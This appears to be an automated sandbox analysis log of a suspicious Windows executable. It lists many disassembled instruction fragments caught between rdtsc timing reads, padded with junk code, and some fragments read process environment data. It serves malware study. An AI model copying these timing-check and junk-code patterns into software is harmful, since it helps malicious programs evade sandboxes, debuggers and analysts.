Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: AA8DA3 second address: AA8DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: AA8DA9 second address: AA8DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: AA933E second address: AA9342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: AA9342 second address: AA934E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: AA934E second address: AA9353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: AA9353 second address: AA938D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F68C0520B48h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d xor dh, 00000000h 0x00000010 push dword ptr [ebp+122D26E3h] 0x00000016 xor dh, FFFFFF8Eh 0x00000019 xor dl, FFFFFFCAh 0x0000001c call 00007F68C0520B49h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F68C0520B53h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: AAB1E9 second address: AAB1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: AACE2D second address: AACE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F68C0520B46h 0x0000000a push eax 0x0000000b pop eax 0x0000000c je 00007F68C0520B46h 0x00000012 popad 0x00000013 jmp 00007F68C0520B50h 0x00000018 push eax 0x00000019 push edx 0x0000001a jng 00007F68C0520B46h 0x00000020 push esi 0x00000021 pop esi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4DB01A9 second address: 4DB0219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dl, D0h 0x0000000d call 00007F68C0B5CAF8h 0x00000012 pushfd 0x00000013 jmp 00007F68C0B5CAF2h 0x00000018 and ecx, 2F5BC758h 0x0000001e jmp 00007F68C0B5CAEBh 0x00000023 popfd 0x00000024 pop esi 0x00000025 popad 0x00000026 xchg eax, ecx 0x00000027 pushad 0x00000028 mov bl, B6h 0x0000002a mov dx, si 0x0000002d popad 0x0000002e call dword ptr [7629188Ch] 0x00000034 mov edi, edi 0x00000036 push ebp 0x00000037 mov ebp, esp 0x00000039 push ecx 0x0000003a mov ecx, dword ptr [7FFE0004h] 0x00000040 mov dword ptr [ebp-04h], ecx 0x00000043 cmp ecx, 01000000h 0x00000049 jc 00007F68C0B8E5C5h 0x0000004f mov eax, 7FFE0320h 0x00000054 mov eax, dword ptr [eax] 0x00000056 mul ecx 0x00000058 shrd eax, edx, 00000018h 0x0000005c mov esp, ebp 0x0000005e pop ebp 0x0000005f ret 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 pushad 0x00000064 popad 0x00000065 mov dx, CAF6h 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4DB0219 second address: 4DB0113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F68C0520B4Ah 0x00000009 xor ax, 18E8h 0x0000000e jmp 00007F68C0520B4Bh 0x00000013 popfd 0x00000014 mov ecx, 1A14A8DFh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop ecx 0x0000001d jmp 00007F68C0520B52h 0x00000022 ret 0x00000023 nop 0x00000024 xor esi, eax 0x00000026 lea eax, dword ptr [ebp-10h] 0x00000029 push eax 0x0000002a call 00007F68C4ECD6B4h 0x0000002f mov edi, edi 0x00000031 pushad 0x00000032 call 00007F68C0520B4Dh 0x00000037 mov ebx, eax 0x00000039 pop eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4DB0113 second address: 4DB0138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push esp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a call 00007F68C0B5CAF7h 0x0000000f pop esi 0x00000010 mov bh, AAh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4DB0138 second address: 4DB017A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F68C0520B56h 0x00000011 mov ebp, esp 0x00000013 jmp 00007F68C0520B50h 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov bl, 75h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4DB017A second address: 4DB017F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60019 second address: 4D6001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6001D second address: 4D60021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60021 second address: 4D60027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60027 second address: 4D6002D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6002D second address: 4D60031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60031 second address: 4D60035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60035 second address: 4D6005B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F68C0520B4Dh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F68C0520B4Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6005B second address: 4D600E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F68C0B5CAEEh 0x00000010 mov eax, dword ptr fs:[00000030h] 0x00000016 jmp 00007F68C0B5CAF0h 0x0000001b sub esp, 18h 0x0000001e jmp 00007F68C0B5CAF0h 0x00000023 xchg eax, ebx 0x00000024 jmp 00007F68C0B5CAF0h 0x00000029 push eax 0x0000002a jmp 00007F68C0B5CAEBh 0x0000002f xchg eax, ebx 0x00000030 pushad 0x00000031 jmp 00007F68C0B5CAF0h 0x00000036 popad 0x00000037 mov ebx, dword ptr [eax+10h] 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D600E1 second address: 4D600E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D600E7 second address: 4D600EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D600EC second address: 4D60117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F68C0520B52h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F68C0520B4Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60117 second address: 4D60154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 jmp 00007F68C0B5CAF8h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F68C0B5CAF7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60154 second address: 4D6015A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6015A second address: 4D6015E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6015E second address: 4D60162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60162 second address: 4D60179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [762C06ECh] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bl, cl 0x00000013 mov ax, bx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60179 second address: 4D6017F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6017F second address: 4D60183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60183 second address: 4D6019A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F68C0520B4Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6019A second address: 4D601B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68C0B5CAF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D601B2 second address: 4D601B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D601B6 second address: 4D601CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F68C0B5D8C0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D601CA second address: 4D601D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D601D0 second address: 4D601D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D601D6 second address: 4D601DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D601DA second address: 4D60202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007F68C0B5CAEEh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60202 second address: 4D60224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F68C0520B4Ah 0x0000000a add esi, 1F920B88h 0x00000010 jmp 00007F68C0520B4Bh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60224 second address: 4D60262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, C32Ah 0x00000007 mov si, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F68C0B5CAF6h 0x00000017 sub ecx, 1B98A118h 0x0000001d jmp 00007F68C0B5CAEBh 0x00000022 popfd 0x00000023 movzx eax, dx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60262 second address: 4D60269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, BAh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60269 second address: 4D602B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call dword ptr [76290B60h] 0x0000000d mov eax, 75A0E5E0h 0x00000012 ret 0x00000013 pushad 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F68C0B5CAF5h 0x0000001b jmp 00007F68C0B5CAEBh 0x00000020 popfd 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 call 00007F68C0B5CAF2h 0x00000029 pop esi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D602B0 second address: 4D602FF instructions: 0x00000000 rdtsc 0x00000002 mov dh, 26h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push 00000044h 0x00000009 jmp 00007F68C0520B4Ah 0x0000000e pop edi 0x0000000f jmp 00007F68C0520B50h 0x00000014 xchg eax, edi 0x00000015 pushad 0x00000016 call 00007F68C0520B4Eh 0x0000001b mov dh, ah 0x0000001d pop ebx 0x0000001e mov dh, ah 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F68C0520B50h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D602FF second address: 4D60303 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60303 second address: 4D60309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60309 second address: 4D60322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, 33h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F68C0B5CAECh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60322 second address: 4D60326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60326 second address: 4D6032C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6032C second address: 4D6036F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b jmp 00007F68C0520B50h 0x00000010 mov eax, dword ptr fs:[00000030h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F68C0520B57h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D603ED second address: 4D603F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D603F1 second address: 4D60402 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60402 second address: 4D60463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007F68C0B5CAF7h 0x00000010 mov dword ptr [esi], edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F68C0B5CAEBh 0x0000001b xor cx, EB0Eh 0x00000020 jmp 00007F68C0B5CAF9h 0x00000025 popfd 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60463 second address: 4D60469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60469 second address: 4D604EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e jmp 00007F68C0B5CAEEh 0x00000013 mov dword ptr [esi+08h], eax 0x00000016 jmp 00007F68C0B5CAF0h 0x0000001b mov dword ptr [esi+0Ch], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F68C0B5CAEDh 0x00000026 pop esi 0x00000027 pushfd 0x00000028 jmp 00007F68C0B5CAF1h 0x0000002d add si, 10B6h 0x00000032 jmp 00007F68C0B5CAF1h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D604EA second address: 4D604FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68C0520B4Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D604FA second address: 4D60525 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+4Ch] 0x0000000b jmp 00007F68C0B5CAF7h 0x00000010 mov dword ptr [esi+10h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60525 second address: 4D60529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60529 second address: 4D6052D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6052D second address: 4D60533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60533 second address: 4D605C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c jmp 00007F68C0B5CAF0h 0x00000011 mov dword ptr [esi+14h], eax 0x00000014 pushad 0x00000015 mov di, cx 0x00000018 mov bx, ax 0x0000001b popad 0x0000001c mov eax, dword ptr [ebx+54h] 0x0000001f pushad 0x00000020 mov ch, 18h 0x00000022 pushfd 0x00000023 jmp 00007F68C0B5CAF7h 0x00000028 add si, 160Eh 0x0000002d jmp 00007F68C0B5CAF9h 0x00000032 popfd 0x00000033 popad 0x00000034 mov dword ptr [esi+18h], eax 0x00000037 pushad 0x00000038 push ecx 0x00000039 call 00007F68C0B5CAF3h 0x0000003e pop esi 0x0000003f pop edi 0x00000040 mov edx, esi 0x00000042 popad 0x00000043 mov eax, dword ptr [ebx+58h] 0x00000046 pushad 0x00000047 mov ebx, eax 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D605C2 second address: 4D605DB instructions: 0x00000000 rdtsc 0x00000002 mov ah, dl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+1Ch], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F68C0520B4Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D605DB second address: 4D605E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D605E1 second address: 4D605E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D605E5 second address: 4D605E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D605E9 second address: 4D6061A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b jmp 00007F68C0520B4Fh 0x00000010 mov dword ptr [esi+20h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F68C0520B50h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6061A second address: 4D60629 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60720 second address: 4D6072F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6072F second address: 4D60735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60735 second address: 4D60739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60739 second address: 4D6073D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6073D second address: 4D6080F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F68C0520B4Dh 0x00000015 adc al, 00000066h 0x00000018 jmp 00007F68C0520B51h 0x0000001d popfd 0x0000001e mov di, si 0x00000021 popad 0x00000022 mov dword ptr [esi+34h], eax 0x00000025 jmp 00007F68C0520B4Ah 0x0000002a mov eax, dword ptr [ebx+18h] 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F68C0520B4Eh 0x00000034 adc si, BC38h 0x00000039 jmp 00007F68C0520B4Bh 0x0000003e popfd 0x0000003f mov ebx, eax 0x00000041 popad 0x00000042 mov dword ptr [esi+38h], eax 0x00000045 jmp 00007F68C0520B52h 0x0000004a mov eax, dword ptr [ebx+1Ch] 0x0000004d pushad 0x0000004e mov edi, ecx 0x00000050 jmp 00007F68C0520B4Ah 0x00000055 popad 0x00000056 mov dword ptr [esi+3Ch], eax 0x00000059 pushad 0x0000005a mov cl, 67h 0x0000005c pushfd 0x0000005d jmp 00007F68C0520B53h 0x00000062 and cx, 6C0Eh 0x00000067 jmp 00007F68C0520B59h 0x0000006c popfd 0x0000006d popad 0x0000006e mov eax, dword ptr [ebx+20h] 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D6080F second address: 4D60845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F68C0B5CAF9h 0x0000000a and ax, DEF6h 0x0000000f jmp 00007F68C0B5CAF1h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 4D60934 second address: 4D6093A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
